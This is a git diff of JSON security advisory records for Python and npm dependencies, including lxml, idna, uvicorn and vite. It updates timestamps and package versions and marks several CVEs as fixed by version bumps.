a/advisories/BREW-torrra-CVE-2023-26302.json b/advisories/BREW-torrra-CVE-2023-26302.json index 686d036f160..ba4855cbbef 100644 --- a/advisories/BREW-torrra-CVE-2023-26302.json +++ b/advisories/BREW-torrra-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2023-26302", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.2.0", "resource": "markdown-it-py", - "resource_purl": "pkg:pypi/markdown-it-py@4.0.0" + "resource_purl": "pkg:pypi/markdown-it-py@4.2.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "markdown-it-py", - "subject_version": "4.0.0", - "key": "pkg:pypi/markdown-it-py@4.0.0", + "subject_version": "4.2.0", + "key": "pkg:pypi/markdown-it-py@4.2.0", "resource": "markdown-it-py" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "markdown-it-py", - "subject_version": "4.0.0", - "key": "pkg:pypi/markdown-it-py@4.0.0", + "subject_version": "4.2.0", + "key": "pkg:pypi/markdown-it-py@4.2.0", "resource": "markdown-it-py" } ] diff --git a/advisories/BREW-torrra-CVE-2023-26303.json b/advisories/BREW-torrra-CVE-2023-26303.json index 72db7fab922..9ca14b9d6c0 100644 --- a/advisories/BREW-torrra-CVE-2023-26303.json +++ b/advisories/BREW-torrra-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2023-26303", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.2.0", "resource": "markdown-it-py", - "resource_purl": "pkg:pypi/markdown-it-py@4.0.0" + "resource_purl": "pkg:pypi/markdown-it-py@4.2.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "markdown-it-py", - "subject_version": "4.0.0", - "key": "pkg:pypi/markdown-it-py@4.0.0", + "subject_version": "4.2.0", + "key": "pkg:pypi/markdown-it-py@4.2.0", "resource": "markdown-it-py" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "markdown-it-py", - "subject_version": "4.0.0", - "key": "pkg:pypi/markdown-it-py@4.0.0", + "subject_version": "4.2.0", + "key": "pkg:pypi/markdown-it-py@4.2.0", "resource": "markdown-it-py" } ] diff --git a/advisories/BREW-torrra-CVE-2024-3651.json b/advisories/BREW-torrra-CVE-2024-3651.json index 2af7473df32..678168ada43 100644 --- a/advisories/BREW-torrra-CVE-2024-3651.json +++ b/advisories/BREW-torrra-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2024-3651", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.11" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.11", - "key": "pkg:pypi/idna@3.11", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.11", - "key": "pkg:pypi/idna@3.11", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-torrra-CVE-2026-4539.json b/advisories/BREW-torrra-CVE-2026-4539.json index 22b56099af7..b41fc89d923 100644 --- a/advisories/BREW-torrra-CVE-2026-4539.json +++ b/advisories/BREW-torrra-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2026-4539", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -26,11 +26,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.19.2" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -43,16 +43,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.19.2", - "key": "pkg:pypi/pygments@2.19.2", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-torrra-CVE-2026-45409.json b/advisories/BREW-torrra-CVE-2026-45409.json index 00c8d2a88d4..0fcbd9b0cd7 100644 --- a/advisories/BREW-torrra-CVE-2026-45409.json +++ b/advisories/BREW-torrra-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2026-45409", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -26,11 +26,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.11" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -43,16 +43,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.11", - "key": "pkg:pypi/idna@3.11", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.11", - "key": "pkg:pypi/idna@3.11", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-torrra-CVE-2026-7246.json b/advisories/BREW-torrra-CVE-2026-7246.json index 24dfa288019..a57cdb83613 100644 --- a/advisories/BREW-torrra-CVE-2026-7246.json +++ b/advisories/BREW-torrra-CVE-2026-7246.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-torrra-CVE-2026-7246", "published": "2026-08-13T17:44:50Z", - "modified": "2026-08-13T17:44:50Z", + "modified": "2026-08-22T09:42:49Z", "upstream": [ "PYSEC-2026-2132", "CVE-2026-7246", @@ -26,11 +26,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "8.3.3", "resource": "click", - "resource_purl": "pkg:pypi/click@8.3.1" + "resource_purl": "pkg:pypi/click@8.4.2" } } ], @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "click", - "subject_version": "8.3.1", - "key": "pkg:pypi/click@8.3.1", + "subject_version": "8.4.2", + "key": "pkg:pypi/click@8.4.2", "resource": "click" } ] diff --git a/advisories/BREW-translate-toolkit-CVE-2014-3146.json b/advisories/BREW-translate-toolkit-CVE-2014-3146.json index 234d1fc9d35..0c6a0f01bed 100644 --- a/advisories/BREW-translate-toolkit-CVE-2014-3146.json +++ b/advisories/BREW-translate-toolkit-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-translate-toolkit-CVE-2014-3146", "published": "2026-08-13T17:44:51Z", - "modified": "2026-08-13T17:44:51Z", + "modified": "2026-08-22T09:42:50Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.3.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-translate-toolkit-CVE-2018-19787.json b/advisories/BREW-translate-toolkit-CVE-2018-19787.json index 7ded9a76d1a..a5c2530fddc 100644 --- a/advisories/BREW-translate-toolkit-CVE-2018-19787.json +++ b/advisories/BREW-translate-toolkit-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-translate-toolkit-CVE-2018-19787", "published": "2026-08-13T17:44:51Z", - "modified": "2026-08-13T17:44:51Z", + "modified": "2026-08-22T09:42:50Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.2.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-translate-toolkit-CVE-2020-27783.json b/advisories/BREW-translate-toolkit-CVE-2020-27783.json index a0a53e2d7ba..90b1988d8b4 100644 --- a/advisories/BREW-translate-toolkit-CVE-2020-27783.json +++ b/advisories/BREW-translate-toolkit-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-translate-toolkit-CVE-2020-27783", "published": "2026-08-13T17:44:51Z", - "modified": "2026-08-13T17:44:51Z", + "modified": "2026-08-22T09:42:50Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.2", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-translate-toolkit-CVE-2021-28957.json b/advisories/BREW-translate-toolkit-CVE-2021-28957.json index f1d5bbb2ded..59bde34dc46 100644 --- a/advisories/BREW-translate-toolkit-CVE-2021-28957.json +++ b/advisories/BREW-translate-toolkit-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-translate-toolkit-CVE-2021-28957", "published": "2026-08-13T17:44:51Z", - "modified": "2026-08-13T17:44:51Z", + "modified": "2026-08-22T09:42:50Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.3", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-translate-toolkit-CVE-2021-43818.json b/advisories/BREW-translate-toolkit-CVE-2021-43818.json index 7af6989aeaf..1775e8d7de7 100644 --- a/advisories/BREW-translate-toolkit-CVE-2021-43818.json +++ b/advisories/BREW-translate-toolkit-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-translate-toolkit-CVE-2021-43818", "published": "2026-08-13T17:44:51Z", - "modified": "2026-08-13T17:44:51Z", + "modified": "2026-08-22T09:42:50Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-translate-toolkit-CVE-2022-2309.json b/advisories/BREW-translate-toolkit-CVE-2022-2309.json index 2c3711da8cf..58123878050 100644 --- a/advisories/BREW-translate-toolkit-CVE-2022-2309.json +++ b/advisories/BREW-translate-toolkit-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-translate-toolkit-CVE-2022-2309", "published": "2026-08-13T17:44:51Z", - "modified": "2026-08-13T17:44:51Z", + "modified": "2026-08-22T09:42:50Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.9.1", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-translate-toolkit-CVE-2026-41066.json b/advisories/BREW-translate-toolkit-CVE-2026-41066.json index 7848c3f36b2..11f6a1c5481 100644 --- a/advisories/BREW-translate-toolkit-CVE-2026-41066.json +++ b/advisories/BREW-translate-toolkit-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-translate-toolkit-CVE-2026-41066", "published": "2026-08-13T17:44:51Z", - "modified": "2026-08-13T17:44:51Z", + "modified": "2026-08-22T09:42:50Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "6.1.0", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-uvicorn-CVE-2020-7694.json b/advisories/BREW-uvicorn-CVE-2020-7694.json index 550b0f65021..755e00d642c 100644 --- a/advisories/BREW-uvicorn-CVE-2020-7694.json +++ b/advisories/BREW-uvicorn-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-uvicorn-CVE-2020-7694", "published": "2026-08-13T17:46:24Z", - "modified": "2026-08-17T18:01:46Z", + "modified": "2026-08-22T09:43:43Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -45,15 +45,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3" + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3" + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4" }, { "strategy": "distro", @@ -65,15 +65,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/kludex/uvicorn", - "subject_version": "0.52.3", + "subject_version": "0.52.4", "key": "upstream:https://github.com/kludex/uvicorn" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "upstream:pkg:pypi/uvicorn@0.52.3" + "subject_version": "0.52.4", + "key": "upstream:pkg:pypi/uvicorn@0.52.4" }, { "strategy": "distro", diff --git a/advisories/BREW-uvicorn-CVE-2020-7695.json b/advisories/BREW-uvicorn-CVE-2020-7695.json index a5f07971f96..edfb9c94cfc 100644 --- a/advisories/BREW-uvicorn-CVE-2020-7695.json +++ b/advisories/BREW-uvicorn-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-uvicorn-CVE-2020-7695", "published": "2026-08-13T17:46:24Z", - "modified": "2026-08-17T18:01:46Z", + "modified": "2026-08-22T09:43:43Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -45,15 +45,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3" + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3" + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4" }, { "strategy": "distro", @@ -65,15 +65,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/kludex/uvicorn", - "subject_version": "0.52.3", + "subject_version": "0.52.4", "key": "upstream:https://github.com/kludex/uvicorn" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "upstream:pkg:pypi/uvicorn@0.52.3" + "subject_version": "0.52.4", + "key": "upstream:pkg:pypi/uvicorn@0.52.4" }, { "strategy": "distro", diff --git a/advisories/BREW-uvicorn-CVE-2024-3651.json b/advisories/BREW-uvicorn-CVE-2024-3651.json index 3a812b08354..9fba9109df4 100644 --- a/advisories/BREW-uvicorn-CVE-2024-3651.json +++ b/advisories/BREW-uvicorn-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-uvicorn-CVE-2024-3651", "published": "2026-08-13T17:46:24Z", - "modified": "2026-08-13T17:46:24Z", + "modified": "2026-08-22T09:43:43Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-uvicorn-CVE-2026-28684.json b/advisories/BREW-uvicorn-CVE-2026-28684.json index ee4e0b6e7e7..26cd8b58c71 100644 --- a/advisories/BREW-uvicorn-CVE-2026-28684.json +++ b/advisories/BREW-uvicorn-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-uvicorn-CVE-2026-28684", "published": "2026-08-13T17:46:24Z", - "modified": "2026-08-13T17:46:24Z", + "modified": "2026-08-22T09:43:43Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "python-dotenv", - "resource_purl": "pkg:pypi/python-dotenv@1.2.2" + "resource_purl": "pkg:pypi/python-dotenv@1.2.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" } ] diff --git a/advisories/BREW-uvicorn-CVE-2026-45409.json b/advisories/BREW-uvicorn-CVE-2026-45409.json index 6c22a5c42f1..f6d5a710b52 100644 --- a/advisories/BREW-uvicorn-CVE-2026-45409.json +++ b/advisories/BREW-uvicorn-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-uvicorn-CVE-2026-45409", "published": "2026-08-13T17:46:24Z", - "modified": "2026-08-13T17:46:24Z", + "modified": "2026-08-22T09:43:43Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-vercel-CVE-2026-44479.json b/advisories/BREW-vercel-CVE-2026-44479.json index 9b5c28d0b73..9c7392f50ae 100644 --- a/advisories/BREW-vercel-CVE-2026-44479.json +++ b/advisories/BREW-vercel-CVE-2026-44479.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vercel-CVE-2026-44479", "published": "2026-08-13T17:46:48Z", - "modified": "2026-08-19T09:45:10Z", + "modified": "2026-08-22T09:44:05Z", "upstream": [ "GHSA-pgf8-2hgj-grqg", "CVE-2026-44479" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vercel", - "subject_version": "59.1.4", - "key": "pkg:npm/vercel@59.1.4" + "subject_version": "59.3.0", + "key": "pkg:npm/vercel@59.3.0" } ] }, diff --git a/advisories/BREW-vite-CVE-2022-35204.json b/advisories/BREW-vite-CVE-2022-35204.json index e33ee47b223..5c9e585d5f5 100644 --- a/advisories/BREW-vite-CVE-2022-35204.json +++ b/advisories/BREW-vite-CVE-2022-35204.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2022-35204", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-mv48-hcvh-8jj8", "CVE-2022-35204" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2023-34092.json b/advisories/BREW-vite-CVE-2023-34092.json index d188b404ae5..d258158f89d 100644 --- a/advisories/BREW-vite-CVE-2023-34092.json +++ b/advisories/BREW-vite-CVE-2023-34092.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2023-34092", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-353f-5xf4-qw67", "CVE-2023-34092" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2023-49293.json b/advisories/BREW-vite-CVE-2023-49293.json index e779103f7ff..d54686a3c5a 100644 --- a/advisories/BREW-vite-CVE-2023-49293.json +++ b/advisories/BREW-vite-CVE-2023-49293.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2023-49293", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-92r3-m2mg-pj97", "CVE-2023-49293" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2024-23331.json b/advisories/BREW-vite-CVE-2024-23331.json index 01fa9f0bcaa..40130605fab 100644 --- a/advisories/BREW-vite-CVE-2024-23331.json +++ b/advisories/BREW-vite-CVE-2024-23331.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2024-23331", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-c24v-8rfc-w8vw", "CVE-2024-23331" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2024-31207.json b/advisories/BREW-vite-CVE-2024-31207.json index 595ec34e290..2fa90d7ec1f 100644 --- a/advisories/BREW-vite-CVE-2024-31207.json +++ b/advisories/BREW-vite-CVE-2024-31207.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2024-31207", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-8jhw-289h-jh2g", "CVE-2024-31207" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2024-45811.json b/advisories/BREW-vite-CVE-2024-45811.json index b98d0cc7dc1..ba8779404d3 100644 --- a/advisories/BREW-vite-CVE-2024-45811.json +++ b/advisories/BREW-vite-CVE-2024-45811.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2024-45811", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-9cwx-2883-4wfx", "CVE-2024-45811" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2024-45812.json b/advisories/BREW-vite-CVE-2024-45812.json index 8a5f2f6b312..a73f9642340 100644 --- a/advisories/BREW-vite-CVE-2024-45812.json +++ b/advisories/BREW-vite-CVE-2024-45812.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2024-45812", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-64vr-g452-qvp3", "CVE-2024-45812" @@ -43,8 +43,8 @@ 